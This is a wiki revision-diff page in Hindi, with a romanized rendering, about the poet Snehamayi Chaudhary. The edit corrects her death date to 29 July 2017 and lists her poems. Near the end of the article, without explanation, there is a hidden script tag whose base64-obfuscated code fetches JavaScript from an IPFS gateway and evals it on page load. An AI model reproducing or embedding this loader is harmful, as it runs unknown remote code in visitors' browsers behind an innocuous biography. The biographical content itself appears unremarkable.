Difference between revisions of "स्नेहमयी चौधरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 6: Line 6:
 
|जन्म= [[9 मई]], [[1935]]  
 
|जन्म= [[9 मई]], [[1935]]  
 
|जन्म भूमि= मौरावां, उन्नाव ज़िला, [[उत्तर प्रदेश]]
 
|जन्म भूमि= मौरावां, उन्नाव ज़िला, [[उत्तर प्रदेश]]
|मृत्यु= [[18 जुलाई]], [[2017]]
+
|मृत्यु= [[29 जुलाई]], [[2017]]
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|अभिभावक=
 
|अभिभावक=
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
'''स्नेहमयी चौधरी''' ([[अंग्रेज़ी]]: Snehamayi Chaudhary, जन्म- [[9 मई]], [[1935]] मौरावां, उन्नाव ज़िला, [[उत्तर प्रदेश]]; मृत्यु- [[18 जुलाई]], [[2017]]) [[हिंदी]] की प्रसिद्ध कवयित्री थीं। उन्हें विशेषत: उनके कविता संग्रहों के लिए जाना जाता है।
+
'''स्नेहमयी चौधरी''' ([[अंग्रेज़ी]]: Snehamayi Chaudhary, जन्म- [[9 मई]], [[1935]] मौरावां, उन्नाव ज़िला, [[उत्तर प्रदेश]]; मृत्यु- [[29 जुलाई]], [[2017]]) [[हिंदी]] की प्रसिद्ध कवयित्री थीं। उन्हें विशेषत: उनके कविता संग्रहों के लिए जाना जाता है।
 
==परिचय==
 
==परिचय==
 
कवयित्री स्नेहमयी चौधरी का जन्म 9 मई 1935 को उत्तर प्रदेश के उन्नाव ज़िले के मौरावां में हुआ था। स्नेहमयी चौधरी [[दिल्ली विश्वविद्यालय]] के कॉलेज में हिन्दी शिक्षिका थीं। उनका [[विवाह]] प्रसिद्ध लेखक [[हरिवंश राय बच्चन]] के साथी [[अजित शंकर चौधरी|अजित कुमार]] के साथ हुआ था। शिक्षिका की नौकरी के बाद उन्होंने अपने पति के साथ स्वतंत्र लेखन का काम शुरु किया।<ref name="f">{{cite web |url=http://www.palpalindia.com/2017/07/30/delhi-Poetry-Snehamayi-Choudhary-heart-attack-demise-Harivansh-Rai-Bachchan-Ajit-Kumar-wife-news-in-hindi-200029.html |title= प्रसिद्ध कवयित्री स्नेहमयी चौधरी का दिल का दौरा पड़ने से निधन |accessmonthday= 03 अगस्त |accessyear= 2017|last= |first= |authorlink= |format= |publisher=www.palpalindia.com|language=हिंदी}}</ref>
 
कवयित्री स्नेहमयी चौधरी का जन्म 9 मई 1935 को उत्तर प्रदेश के उन्नाव ज़िले के मौरावां में हुआ था। स्नेहमयी चौधरी [[दिल्ली विश्वविद्यालय]] के कॉलेज में हिन्दी शिक्षिका थीं। उनका [[विवाह]] प्रसिद्ध लेखक [[हरिवंश राय बच्चन]] के साथी [[अजित शंकर चौधरी|अजित कुमार]] के साथ हुआ था। शिक्षिका की नौकरी के बाद उन्होंने अपने पति के साथ स्वतंत्र लेखन का काम शुरु किया।<ref name="f">{{cite web |url=http://www.palpalindia.com/2017/07/30/delhi-Poetry-Snehamayi-Choudhary-heart-attack-demise-Harivansh-Rai-Bachchan-Ajit-Kumar-wife-news-in-hindi-200029.html |title= प्रसिद्ध कवयित्री स्नेहमयी चौधरी का दिल का दौरा पड़ने से निधन |accessmonthday= 03 अगस्त |accessyear= 2017|last= |first= |authorlink= |format= |publisher=www.palpalindia.com|language=हिंदी}}</ref>
Line 38: Line 38:
 
इनकी प्रसिद्ध [[कविता]] में 'पूरा गलत पाठ', 'चौतरफा लड़ाई', और 'हड़कंप' प्रमुख हैं, जबकि ‘पहचान’ ‘कैद’ 'अपनी ही औरत', 'एक इंटरव्यू', 'घर', 'मेरा अपना कोना', ‘लड़की’ उनकी प्रमुख कविताएं हैं।<ref name="f"/>
 
इनकी प्रसिद्ध [[कविता]] में 'पूरा गलत पाठ', 'चौतरफा लड़ाई', और 'हड़कंप' प्रमुख हैं, जबकि ‘पहचान’ ‘कैद’ 'अपनी ही औरत', 'एक इंटरव्यू', 'घर', 'मेरा अपना कोना', ‘लड़की’ उनकी प्रमुख कविताएं हैं।<ref name="f"/>
 
==निधन==
 
==निधन==
हिन्दी की चर्चित कवयित्री स्नेहमयी चौधरी का 82 वर्ष की उम्र में [[18 जुलाई]], [[2017]] को दिल का दौरा पड़ने से निधन हो गया।
+
हिन्दी की चर्चित कवयित्री स्नेहमयी चौधरी का 82 वर्ष की उम्र में [[29 जुलाई]], [[2017]] को दिल का दौरा पड़ने से निधन हो गया।
  
  

Latest revision as of 10:59, 4 August 2017

snehamayi chaudhari
poora nam snehamayi chaudhari
janm 9 mee, 1935
janm bhoomi mauravaan, unnav zila, uttar pradesh
mrityu 29 julaee, 2017
pati/patni ajit shankar chaudhari
karm bhoomi bharat
mukhy rachanaean 'poora galat path', 'chautarapha l daee', aur 'h dakanp'.
vishay kavita
prasiddhi kavayitri
nagarikata bharatiy
inhean bhi dekhean kavi soochi, sahityakar soochi

snehamayi chaudhari (aangrezi: Snehamayi Chaudhary, janm- 9 mee, 1935 mauravaan, unnav zila, uttar pradesh; mrityu- 29 julaee, 2017) hiandi ki prasiddh kavayitri thian. unhean visheshat: unake kavita sangrahoan ke lie jana jata hai.

parichay

kavayitri snehamayi chaudhari ka janm 9 mee 1935 ko uttar pradesh ke unnav zile ke mauravaan mean hua tha. snehamayi chaudhari dilli vishvavidyalay ke k aaulej mean hindi shikshika thian. unaka vivah prasiddh lekhak harivansh ray bachchan ke sathi ajit kumar ke sath hua tha. shikshika ki naukari ke bad unhoanne apane pati ke sath svatantr lekhan ka kam shuru kiya.[1]

prasiddh kavitaean

inaki prasiddh kavita mean 'poora galat path', 'chautarapha l daee', aur 'h dakanp' pramukh haian, jabaki ‘pahachan’ ‘kaid’ 'apani hi aurat', 'ek iantaravyoo', 'ghar', 'mera apana kona', ‘l daki’ unaki pramukh kavitaean haian.[1]

nidhan

hindi ki charchit kavayitri snehamayi chaudhari ka 82 varsh ki umr mean 29 julaee, 2017 ko dil ka daura p dane se nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 prasiddh kavayitri snehamayi chaudhari ka dil ka daura p dane se nidhan (hiandi) www.palpalindia.com. abhigaman tithi: 03 agast, 2017.

sanbandhit lekh